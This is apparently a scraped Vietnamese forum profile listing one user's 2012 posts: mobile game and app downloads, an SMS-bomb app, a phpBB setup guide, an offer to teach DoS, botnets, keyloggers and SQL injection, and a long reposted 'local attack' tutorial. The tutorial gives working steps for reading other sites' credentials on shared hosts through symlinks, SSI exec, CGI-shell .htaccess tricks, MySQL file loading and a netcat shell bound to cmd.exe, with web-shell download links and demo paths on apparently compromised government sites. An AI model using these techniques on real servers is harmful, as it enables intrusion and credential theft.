Bang hộiTiền mặt: 0 XuNạp XuXúc xắc OnlineXổ số CHIASE123.COMĐập trứngBầu cua tôm cáHộp quà giáng sinh

Domain, hosting, vps giá rẻ

Đã tìm thấy 16 kết quả

Quay lại

[Game Java] Rebel Raiders: Operation Nighthawk

https://mobimg.b-cdn.net/file_exchange/java_game_images/games/2/1238/real/1.jpg
Trái đất. Tương lai gần nhất. Bạn điều khiển một con tàu vũ trụ mạnh mẽ và chiến đấu chống lại đội quân khổng lồ của các mục tiêu kẻ thù. Bạn sẽ tìm thấy tám nhiệm vụ thú vị và đầy thử thách và một ông chủ ở cuối mỗi nhiệm vụ. Trò chơi có đồ họa tuyệt vời và cốt truyện thú vị! Tiêu diệt tất cả kẻ thù và giải phóng hành tinh khỏi những kẻ xâm lược ngoài hành tinh!
https://mobimg.b-cdn.net/file_exchange/java_game_images/games/2/1238/real/2.jpg
https://mobimg.b-cdn.net/file_exchange/java_game_images/games/2/1238/real/3.jpg
https://mobimg.b-cdn.net/file_exchange/java_game_images/games/2/1238/real/4.jpg
Thông tin game
Game bắn súng máy bay
Dung lượng 599kb
Hỗ trợ duy nhất 240x320
Link tải game
Tải game
Tải game
Tải game
gửi bởi chicanpro
15/03/2012 18:37
 
Jump to forum
Jump to topic

Re: TOPIC HỎI ĐÁP

tuanl0ng561 đã viết:
Fomat la gì em không hiểu em ngu eng lắm

Định dạng lại
format máy cho máy hết virus, k nên thường xuyên format máy, nó sẽ chai
format thẻ cho nó hết virus, nên nhớ format xong mất data
gửi bởi chicanpro
17/03/2012 21:31
 
Jump to forum
Jump to topic

Re: Topic yêu cầu game tất cả màn hình

kusonluv đã viết:
Anh có thể chỉ cụ thể hơn về cách việt hóa được không? E ga con nên không biết gì hết

Em chuẩn bị 1 con blue ftp và 1 số công cụ cần thiết
gửi bởi chicanpro
18/03/2012 19:44
 
Jump to forum
Jump to topic

SMS mẫu | SMS sụp nguồn 1200

Gói tín nhắn mẫu cực hay đã được nén vào file java, đặc biệt có tin nhắn sụp nguồn 1200
Tai về

Thank dùm mấy cái đi chú em
gửi bởi chicanpro
20/03/2012 19:47
 
Jump to forum
Jump to topic

Ultra mp3 cực đẹp

Do mình đi leech phần mềm cho anh em nên, nó bản rar, anh em kiếm cái phần mềm giải nén file rar zip j đấy mà giải rôi dùng

UltraMP3_viethoa.rar
Chương trình nghe nhạc Ultra Mp3 phiên bản mới được Việt hóa, bắt mắt, dễ sử dụng.
Kích thước: 233.8 K
http://soft4mobi.com/load-screenshot.htm?screenshotId=516&thumbnail=200x200



Ultra mp3 cực đẹp
Thank cho em vài cái bà con
gửi bởi chicanpro
20/03/2012 20:15
 
Jump to forum
Jump to topic

Phần mềm bom SMS cho s60 nè

Phần mềm bom SMS thì miễn bàn

Thank rồi mới tải nha

Thank đi em kiếm cho 1 con java
gửi bởi chicanpro
20/03/2012 20:21
 
Jump to forum
Jump to topic

Chương trình khoá máy khá mạnh dùng cho các máy dòng symbian

Hình ảnh
Chương trình khoá máy khá mạnh dùng cho các máy dòng symbian S60 không có chức năng tự động khoá phím như 6600, 7610...
Kích thước: 124
Tải về ở đây nè, k thạnk tải luôn thất bại
gửi bởi chicanpro
20/03/2012 20:41
 
Jump to forum
Jump to topic

Top phần mềm Java hay này

# Auto_Messaging.jar
# BeoFrenz.jar
# BeoFrenz_Mobile_Messenger.jar
# Blueeee_IM.jar
# Chat.jar
# ClienteChat.jar
# Colibry_IM.jar
# EmailReader.jar
# EmailViewer.jar
# Gmail_indo.jar
# InetTools_IRC_179.jar
# Inettools_EMail.jar
# JabberMixClient.jar
# MIMessenger2.jar
# Mail4ME.jar
# MegaSender.jar
# MercuryIM.jar
# MiyuX_v51_beta.jar
# MobileChat.jar
# Morange_Mobile_331.jar
# MujMail0.02cs.jar
# MultiSMS.jar
# MyMobile.jar
# Nimbuzz.jar
# ProMobiMail.jar
# QSM2.jar
# SMSBOX_Love_SMS.jar
# SMSPlanetS40.jar
# SMSPlus.jar
# SecureMessenger.jar
# SendFax.jar
# SendMail.jar
# ShinChat.jar
# Skype_1211.jar
# Skype_BETA.jar
# Smart_Mail.jar
# Smssender.jar
# UEMail17.jar
# YMTiny.jar
# Yahoo_Email_App.jar
# eBuddy_Mobile_Messenger.jar
# getaboo.jar
# mig33.jar
# sirius.jar
# smsbug.jar
Còn đây là link down
http://vlaptrinh.tk/soft/Auto_Messaging.jar
http://vlaptrinh.tk/soft/BeoFrenz.jar
http://vlaptrinh.tk/soft/BeoFrenz_Mobile_Messenger.jar
http://vlaptrinh.tk/soft/Blueeee_IM.jar
http://vlaptrinh.tk/soft/Chat.jar
http://vlaptrinh.tk/soft/ClienteChat.jar
http://vlaptrinh.tk/soft/Colibry_IM.jar
http://vlaptrinh.tk/soft/EmailReader.jar
http://vlaptrinh.tk/soft/EmailViewer.jar
http://vlaptrinh.tk/soft/Gmail_indo.jar
http://vlaptrinh.tk/soft/InetTools_IRC_179.jar
http://vlaptrinh.tk/soft/Inettools_EMail.jar
http://vlaptrinh.tk/soft/JabberMixClient.jar
http://vlaptrinh.tk/soft/MIMessenger2.jar
http://vlaptrinh.tk/soft/Mail4ME.jar
http://vlaptrinh.tk/soft/MegaSender.jar
http://vlaptrinh.tk/soft/MercuryIM.jar
http://vlaptrinh.tk/soft/MiyuX_v51_beta.jar
http://vlaptrinh.tk/soft/MobileChat.jar
http://vlaptrinh.tk/soft/Morange_Mobile_331.jar
http://vlaptrinh.tk/soft/MujMail0.02cs.jar

http://vlaptrinh.tk/soft/MultiSMS.jar
http://vlaptrinh.tk/soft/MyMobile.jar
http://vlaptrinh.tk/soft/Nimbuzz.jar
http://vlaptrinh.tk/soft/ProMobiMail.jar
http://vlaptrinh.tk/soft/QSM2.jar
http://vlaptrinh.tk/soft/SMSBOX_Love_SMS.jar
http://vlaptrinh.tk/soft/SMSPlanetS40.jar
http://vlaptrinh.tk/soft/SMSPlus.jar
http://vlaptrinh.tk/soft/SecureMessenger.jar
http://vlaptrinh.tk/soft/SendFax.jar
http://vlaptrinh.tk/soft/SendMail.jar
http://vlaptrinh.tk/soft/ShinChat.jar
http://vlaptrinh.tk/soft/Skype_1211.jar
http://vlaptrinh.tk/soft/Skype_BETA.jar
http://vlaptrinh.tk/soft/Smart_Mail.jar
http://vlaptrinh.tk/soft/Smssender.jar
http://vlaptrinh.tk/soft/UEMail17.jar
http://vlaptrinh.tk/soft/YMTiny.jar
http://vlaptrinh.tk/soft/Yahoo_Email_App.jar
http://vlaptrinh.tk/soft/eBuddy_Mobile_Messenger.jar
http://vlaptrinh.tk/soft/getaboo.jar
http://vlaptrinh.tk/soft/mig33.jar
http://vlaptrinh.tk/soft/sirius.jar
http://vlaptrinh.tk/soft/smsbug.jar
gửi bởi chicanpro
21/03/2012 18:41
 
Jump to forum
Jump to topic

Chụp ảnh màn hình MiniHalo

Đây là phần mềm MiniHalo
v3.0.2 chức năng chính là
dùng để tạo Java chụp ảnh
màn hình.
Mình đã vh full 100% nên
khá dễ sử dụng. Mọi người
đown về
dùng nha.
Chức năng và sử dụng như
cũ:
Phím mặc định : Call
Hỗ trợ tất cả màn hình.
dowload click
Hàng leech bà con à :))
gửi bởi chicanpro
15/03/2012 19:03
 
Jump to forum
Jump to topic

Phần mềm UCWEB, lướt nhanh như sóc

UC là một trình duyệt di động để hỗ trợ WEB xuất sắc,, xem trang WAP, nhanh và ổn định, xem video, web menu, tìm kiếm, tải xuống, quản lý dữ liệu cá nhân và các chức năng khác,...

http://www.download.com.vn/Data/Image/doanhnghiep/112010/18/19UCBrowser105.jpg

Download phiên bản dành cho hệ điều hành

Download tại đây
http://vi.ucweb.com/Vietnamese/UCbrowser/platform-product-ucweb-platform-java.html

Đã được Việt hoá
Em đã test, sài viettel có khi down tới 26k/s, kinh lắm, cái này thích hợp cho anh em yêu đồ nặng
gửi bởi chicanpro
12/03/2012 15:19
 
Jump to forum
Jump to topic

Làm một web giống gocdidong.org không tốn 1 cắt

Làm một web giống chiase123.comkhông tốn 1 cắt, sao bạn lại không thữ, ở đây tui chỉ nói sơ qua thôi, nói chung củng dễ lắm
Phần 1: tìm host
Đối với host có thể tìm hoặc mua, ở đây là các host miển phí, sài chết luôn
1 byethost.com
2 website24h.info
3 freevnn.com
4 zymic.com
5 oni.cc
tạo xong host các bạn check mail và xem thông tin
Phần 2: Up wap lên server, có nghĩa là bạn cho bộ mã nguồn vào địa chỉ bạn mới đk host
- bạn tải về file zilla ở đây
- cài và chạy, sau đó nhập thông tin host của bạn mới đăng kí ở phần 1
- bạn tải bộ mã phpbb tại đây
- bạn giải nén bộ mã ra = cách mở winrar, sau đó nhấn extract, tốt nhất ra desktop máy tính nha
- bạn trở lại file zilla, sau đó vào mục htdocs của host( phần bên tay phải)
- bạn chọn cái folder mã phpbb của bạn vùa giải nén, sau đó nhấn chuột phải chọn upload
- trong thời gian chờ đợi nó up, chúng ta lên host, bạn sài byethost thì bạn vào = cách: cpanel.<server byethost của bạn>.com
- bạn nhập mật khẩu và user của bạn vào hai cái đó, sau đó điền mã capcha
- bạn vào phần mysql, nhấn vào nút tạo database, sau đó điền tên database vầ mật khẩu
- bộ mã đã up xong xui, bạn vào trang chủ, cài đặt và nhập thông số database mà bạn vừa tạo, nhớ là có user_<tên database của bạn>, chứ có 1 mình tên bạn mới vừa tạo nó không nhận
- điền vào port là 21
- điền tên tk admin và email. xong xui nó đưa ra 1 tệp tin yêu cầu bạn tải về, bản tải về và đôi tên thành config.php
- cài xong bạn vào host bằng file zilla, sau đó up file config mới vùa tải về, nhớ đè lên cái cũ nha.
- bạn chmod các thư mục và file sau thành 777: files, cache, images/avatar/upload bằng cách chọn các folder đó và nhấn chuột phải, chọn file perms ( permission) bạn điền vào số 777
- bạn xoá thư mục install đi
- chúc mừng bạn

Mọi thứ khác là do bạn quyết định, viết bài này hết 1 tiếng của tui rồi, cảm ơn dùm nha các bạn đọc
Chỉ có ở chiase123.com, leech thì để lại nguồn và tác giả chicanpro à nha

:)). chúc các bác thành công
gửi bởi chicanpro
24/03/2012 18:51
 
Jump to forum
Jump to topic

Topic tuyển đệ tử học IT- WEB- HACK cở bản

Như tiêu đề, nhưng lúc này thời gian có hạn, mình mắc học bài thi đh, ai muốn học thì đăng kí topic này
Nội dung:
1/ Dos web= Máy ảo
2/ Botnet
3/ Keylog
4/ Hack local web
5/ SQL injection- Hack shop
6/ Làm forum VBB
7/ Sử dụng các mã nguồn
Vân vân và vân vân

Thời gian dạy là khi nào online 2 tiếng đỗ lên thì dạy, hoặc các bạn đk trước tết mình rãnh mấy bữa dạy cho

Ngày thứ 3 này 9h sáng dạy cho anh em luôn
Lúc trước có gây oán với forum này, nhưng hôm nay muốn truyền đạt 1 số kiến thức cho các bạn.
Mình rất gà nhưng muốn truyền cho các bạn- Kiến thức không có j để dấu

Mọi thắc mắc pm yahoo lendtime
gửi bởi chicanpro
21/10/2012 17:21
 
Jump to forum
Jump to topic

Re: Topic tuyển đệ tử học IT- WEB- HACK cở bản

Nopita đã viết:
Thời gian dạy là từ mấy giờ đến mấy giờ.và từ ngày nào anh? :) :)

Thời gian vào: 3h-> 4h30 chủ nhật hàng tuần
Còn thứ 3 tuần này sáng 9h nhá
Còn tới tết thì dạy mấy ngày luôn
gửi bởi chicanpro
21/10/2012 17:30
 
Jump to forum
Jump to topic

TUT hack local cơ bản by Soleil

Hack local cơ bản

Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ: Giới thiệu tính năng 1 số shell






* Nhắc lại trình tự các bước Local Attack
1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell

1- View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, từ đó tìm cách đọc file config.php của user đó.
- Một số câu lệnh để get user:
Lệnh phổ biến nhất:

Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:
http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f
Pass download: soleil_vhb
Pass dải nén: ceh.vn
- Câu lênh get user & domain

Cat /etc/virtual/domainowners


2- Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php


- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).
- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:

Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php

( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là path mặc định dẫn tới file init.php))……
3- Get thông tin file config
Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.
3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:
- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục

Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php

- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:

Cat /home/vhbgroup/public_html/@4rum/includes/config.php

- Ln : Lệnh symbolic link:

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.phpsoleil.ini

- Cd: Chuyển đổi thư mục
Ví dụ muốn chuyển tới thư mục soleil”

Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc

- Chmod: Phân quyền cho các file hoặc thư mục:

Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )

- Mkdir: tạo thư mục:
Ví du muốn tạo thư mục soleil trong thư mục includes:

Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil

- Touch : Tạo file:

touch /home/vhbgroup/public_html/@4rum/includes/soleil.php

- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root

Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)

Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)

…………
3.2- Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php
1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.
Ví dụ:

dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php

Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi
2- Sử dụng Symbolic link – Gọi tắt là symlink
Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.

Ln -s /home/vhbgroup/public_html/@4rum/includes/config.phpsoleil.ini

Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.
3- Sử dụng symlink kết hợp với ssi:
Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:

<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.
4- Chạy lệnh bằng file .shtml
- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->

- Lệnh xem file logs như sau:

<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->

Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
5- Get all config toàn server
- Đâu tiên download shell get all config ( w.php) về rồi up lên server.
http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )
- Click vào done và thư mục có tên là tmp sẽ được tạo ra.
- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:
+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink



- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”
- Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server.
* Đặc điểm của con shell get all config này:
+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.

6- Symbolink Root:
- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo (pass download: soleil_vhb, pass dải nén: ceh.vn)
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:

Tar –zxvf r00t.tar.gz

- Up file .htacess cùng thư mục với file r00t:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell
Demo:
http://tnmthatinh.gov.vn/soleil/r00t/
Và đây là cấu trúc của trường http://cdhh.edu.vn/
http://tnmthatinh.gov.vn/soleil/r00t/home/cdhh/public_html/
7- Backconnet:
Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.
Đồ nghề cần thiết:
- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40
- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw
Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.exe -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.
- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw
( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )
- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng
- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]
Một số câu lệnh có thể sử dụng:

nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443

+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đến
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.
- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat
- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.
8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau
create table soleil ( ducdung08clc varchar (1024));
- Query load các thông tin vào table table vừa được tạo:
load data local infile '/etc/passwd' into table soleil
Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.
- Query hiện thị các thông tin được load vào table soleil:
select * from soleil
- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.
1 số lưu ý:
- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:
+ Soleil.pin
http://www.mediafire.com/?4k94v1i0shmr46c
Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:

## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##

Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pin
AddHandler cgi-script .pin

+ telnet.pl
http://www.mediafire.com/?t9cavs1n0ipthq1
shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.
( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )
- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.
+ facesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )
+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef
+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2

+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc sử dụng via sqli
v.v….
(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)
Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal...
Được đăng bởi Bình Dương vào lúc 03:13 Không có nhận xét nào:
Gửi email bài đăng nàyBlogThis!Chia sẻ lên TwitterChia sẻ lên Facebook
Nhãn: Local Attack, TUTORIALS
Thứ hai, ngày 20 tháng tám năm 2012
Sym R00t
Method : sym root



http://www.mediafire.com/?1wlmj5rqb9afgew - sym.tar
- Đầu tiên up sym.tar lên
Sau đó run câu lệnh

tar -xvf sym.tar
- Và cuối cùng là đi đến folder victim:


domain/folder chứa sym/sym/root/home/user/public_html/

Xong ^^!
Chắc mình dạy các bạn không đc, các bạn xem tut đở nha


bạn pub ra cho emem xem dùm mình đi, mình hết tg rồi
gửi bởi chicanpro
23/10/2012 10:01
 
Jump to forum
Jump to topic

Phần mềm unlock máy Trung Quốc MTK bằng máy tính

Phần mềm unlock máy TQ cực hay, tải về link ở dưới
[url=
http://soft4mobi.com/load-file.htm?down ... fbc8f7dc5d]Thank trước khi tải[/url]
gửi bởi chicanpro
20/03/2012 20:25
 
Jump to forum
Jump to topic

Re: Topic yêu cầu game tất cả màn hình

Ai tìm giúp ít game bắn súng giống cf trên pc
Cái này bạn hãy lấy điện thoại mà tải, tại vì tớ không có sài điện thoại nên k thể đưa cho cậu đc
B1: lên wap.in
B2: nhấn vào mục game--> hành động
B3: Nhấn tìm và đánh chữ này vào: 3d counter chọn dòng đầu tiên, game này chơi củng tạm đc
Nhớ thank dùm
gửi bởi chicanpro
14/03/2012 15:57
 
Jump to forum
Jump to topic
cron